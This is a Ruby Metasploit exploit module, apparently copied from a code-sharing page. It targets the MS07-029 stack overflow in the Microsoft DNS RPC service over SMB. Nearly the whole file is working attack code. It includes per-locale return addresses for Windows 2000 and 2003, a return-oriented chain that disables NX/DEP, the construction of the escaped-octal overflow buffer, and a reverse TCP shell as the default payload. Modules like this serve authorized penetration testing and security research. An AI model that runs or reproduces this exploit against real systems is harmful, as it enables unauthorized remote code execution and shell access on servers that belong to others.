Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ManualRanking
8

9
  include Msf::Exploit::Remote::DCERPC
10
  include Msf::Exploit::Remote::SMB::Client
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)',
15
      'Description'    => %q{
16
          This module exploits a stack buffer overflow in the RPC interface
17
        of the Microsoft DNS service. The vulnerability is triggered
18
        when a long zone name parameter is supplied that contains
19
        escaped octal strings. This module is capable of bypassing NX/DEP
20
        protection on Windows 2003 SP1/SP2. This module exploits the
21
        RPC service using the \\DNSSERVER pipe available via SMB. This
22
        pipe requires a valid user account to access, so the SMBUSER
23
        and SMBPASS options must be specified.
24
      },
25
      'Author'         =>
26
        [
27
          'hdm',     # initial module
28
          'Unknown', # 2 unknown contributors (2003 support)
29
          'bcoles'   # additional target offsets
30
        ],
31
      'License'        => MSF_LICENSE,
32
      'References'     =>
33
        [
34
          ['CVE', '2007-1748'],
35
          ['OSVDB', '34100'],
36
          ['MSB', 'MS07-029']
37
        ],
38
      'Privileged'     => true,
39
      'DefaultOptions' =>
40
        {
41
          'EXITFUNC' => 'thread',
42
          'PAYLOAD' => 'windows/shell/reverse_tcp'
43
        },
44
      'Payload'        =>
45
        {
46
          'Space'    => 500,
47

48
          # The payload doesn't matter, but make_nops() uses these too
49
          'BadChars' => "\x00",
50

51
          'StackAdjustment' => -3500,
52

53
        },
54
      'Platform'       => 'win',
55
      'Targets'        =>
56
        [
57
          [ 'Automatic (2000 SP0-SP4, 2003 SP0-SP2)', { } ],
58

59
          # p/p/r WS2HELP.DLL
60
          [ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
61
          [ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
62
          [ 'Windows 2000 Server SP0-SP4+ German', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
63
          [ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
64
          [ 'Windows 2000 Server SP0-SP4+ Polish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
65
          [ 'Windows 2000 Server SP0-SP4+ Portuguese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
66
          [ 'Windows 2000 Server SP0-SP4+ Korean', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
67
          [ 'Windows 2000 Server SP0-SP4+ Russian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
68
          [ 'Windows 2000 Server SP0-SP4+ Simplified Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
69
          [ 'Windows 2000 Server SP0-SP4+ Spanish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
70
          [ 'Windows 2000 Server SP0-SP4+ Swedish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
71
          [ 'Windows 2000 Server SP0-SP4+ Traditional Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
72
          [ 'Windows 2000 Server SP0-SP4+ Turkish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fc2ac4 } ],
73

74
          # Use the __except_handler3 method (and jmp esp in ATL.dll)
75
          [ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],
76
          [ 'Windows 2003 Server SP0 French', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f35a34, 0x77f6e7f0, 0x76a435bf] } ],
77

78
          # ATL.DLL (bypass DEP/NX, IB -> Image Base of ATL.dll)
79
          [ 'Windows 2003 Server SP1-SP2 English', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a80000 } ],
80
          [ 'Windows 2003 Server SP1-SP2 French', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
81
          [ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
82
          [ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
83
          [ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
84
          [ 'Windows 2003 Server SP1-SP2 Russian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769a0000 } ],
85
          [ 'Windows 2003 Server SP1-SP2 Simplified Chinese', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769c0000 } ],
86
        ],
87
      'DisclosureDate' => '2007-04-12',
88
      'DefaultTarget'  => 0 ))
89

90
    register_options(
91
      [
92
        OptString.new('Locale', [ true,  "Locale for automatic target (English, French, Italian, ...)", 'English'])
93
      ])
94

95
    deregister_options('SMB::ProtocolVersion')
96
  end
97

98

99
  def gettarget(os)
100

101
    targets.each do |target|
102
      if ((target['OS'] =~ /#{os}/) && (target.name =~ /#{datastore['Locale']}/))
103
        return target
104
      end
105
    end
106

107
    return nil
108
  end
109

110

111
  def exploit
112

113
    connect(versions: [1])
114
    smb_login()
115

116
    if target.name =~ /Automatic/
117

118
      case smb_peer_os()
119
      when 'Windows NT 4.0'
120
        print_status("Detected a Windows NT 4.0 system...")
121
        target = nil
122

123
      when 'Windows 5.0'
124
        print_status("Detected a Windows 2000 SP0-SP4 target...")
125
        target = gettarget('2000')
126

127
      when 'Windows 5.1'
128
        print_status("Detected a Windows XP system...")
129
        target = nil
130

131
      when /Windows Server 2003 (\d+)$/
132
        print_status("Detected a Windows 2003 SP0 target...")
133
        target = gettarget('2003SP0')
134

135
      when /Windows Server 2003 (\d+) Service Pack (\d+)/
136
        print_status("Detected a Windows 2003 SP#{$2} target...")
137
        target = gettarget('2003SP12')
138
      else
139
        fail_with(Failure::NoTarget, "No target for OS: #{smb_peer_os}")
140
      end
141
    end
142

143
    if (not target)
144
      fail_with(Failure::NoTarget, "There is no available target for '#{datastore['LOCALE']}' locale")
145
    end
146

147
    print_status("Trying target #{target.name}...")
148

149
    # Bind to the service
150
    handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_np', ['\dnsserver'])
151
    print_status("Binding to #{handle} ...")
152
    dcerpc_bind(handle)
153
    print_status("Bound to #{handle} ...")
154

155
    # Create our buffer with our shellcode first
156
    txt = Rex::Text.rand_text_alphanumeric(8192)
157

158
    if (target['OS'] =~ /2000/)
159
      txt[0, payload.encoded.length] = payload.encoded
160

161
      off = target['Off']
162
      txt[ off ] = [target.ret].pack('V')
163
      txt[ off - 4, 2] = "\xeb\x06"
164
      txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
165

166
    elsif (target['OS'] =~ /2003SP0/)
167
      txt[0, payload.encoded.length] = payload.encoded
168

169
      off = target['Off']
170
      txt[ off ] = [target['Rets'][0]].pack('V')  # __except_handler3
171
      txt[ off - 4, 2] = "\xeb\x16"
172

173
      # addr = A + B*12 + 4 = 0x77f7e7f0  (ntdll -> 0x77f443c9)
174
      addr = target['Rets'][1] - 4
175
      addr1 = addr / 2
176
      addr2 = addr1 + addr % 2
177
      addr1 = addr1 + (addr2 % 12)
178
      addr2 = addr2 / 12
179

180
      txt[ off + 4, 8] = [addr1, addr2].pack('VV') # A,B
181

182
      #
183
      # then mov eax, [addr] sets eax to 0x77f443c9 and the code goes here :
184
      #
185
      # 0x77f443c9 jmp off_77f7e810[edx*4]   ;  edx = 0 so jmp to 77f443d0
186
      # 0x77f443d0 mov eax, [ebp+arg_0]
187
      # 0x77f443d3 pop esi
188
      # 0x77f443d4 pop edi
189
      # 0x77f443d5 leave    ; mov esp, ebp
190
      # 0x77f443d6 retn     ; ret
191

192
      txt[ off + 16, 4] = [target['Rets'][2]].pack('V')  # jmp esp
193
      txt[ off + 20, 5] = "\xe9" + [ (off+23) * -1 ].pack('V')
194

195
    elsif (target['OS'] =~ /2003SP12/)
196
      off = target['Off']
197
      ib  = target['IB']
198
      txt[ off ] = [ib + 0x2566].pack('V')
199

200

201
      # to bypass NX we need to emulate the call to ZwSetInformationProcess
202
      # with generic value (to work on SP1-SP2 + patches)
203

204
      off = 445
205

206
      # first we set esi to 0xed by getting the value on the stack
207
      #
208
      # 0x76a81da7:
209
      # pop esi   <- esi = edh
210
      # retn
211

212
      txt[ off + 4, 4 ] = [ib + 0x1da7].pack('V')
213
      txt[ off + 28, 4] = [0xed].pack('V')
214

215
      # now we set ecx to 0x7ffe0300, eax to 0xed
216
      # 0x76a81da4:
217
      # pop ecx    <-  ecx = 0x7ffe0300
218
      # mov eax, esi   <- eax == edh
219
      # pop esi
220
      # retn
221

222
      txt[ off + 32, 4] = [ib + 0x1da4].pack('V')
223
      txt[ off + 36, 4] = [0x7ffe0300].pack('V')
224

225
      # finally we call NtSetInformationProcess (-1, 34, 0x7ffe0270, 4)
226
      # 0x7FFE0270 is a pointer to 0x2 (os version info :-) to disable NX
227
      # 0x76a8109c:
228
      # call dword ptr [ecx]
229

230
      txt[ off + 44, 4] = [ib + 0x109c].pack('V')  # call dword ptr[ecx]
231
      txt[ off + 52, 16] = [-1, 34, 0x7FFE0270, 4].pack('VVVV')
232

233
      # we catch the second exception to go back to our shellcode, now that
234
      # NX is disabled
235

236
      off = 1013
237
      txt[ off, 4 ] = [ib + 0x135bf].pack('V')   # (jmp esp in atl.dll)
238
      txt[ off + 24, payload.encoded.length ] = payload.encoded
239

240
    end
241

242
    req = ''
243

244
    # Convert the string to escaped octal
245
    txt.unpack('C*').each do |c|
246
      req << "\\"
247
      req << c.to_s(8)
248
    end
249

250
    # Build the RPC stub data
251
    stubdata =
252
      NDR.long(rand(0xffffffff)) +
253
      NDR.wstring(Rex::Text.rand_text_alpha(1) + "\x00\x00") +
254

255
      NDR.long(rand(0xffffffff)) +
256
      NDR.string(req + "\x00") +
257

258
      NDR.long(rand(0xffffffff)) +
259
      NDR.string(Rex::Text.rand_text_alpha(1) + "\x00")
260

261
    print_status('Sending exploit...')
262

263
    begin
264
      response = dcerpc.call(1, stubdata)
265

266
      if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
267
        print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])
268
      end
269
    rescue ::Exception => e
270
      print_error("Error: #{e}")
271
    end
272

273
    handler
274
    disconnect
275
  end
276
end
277

278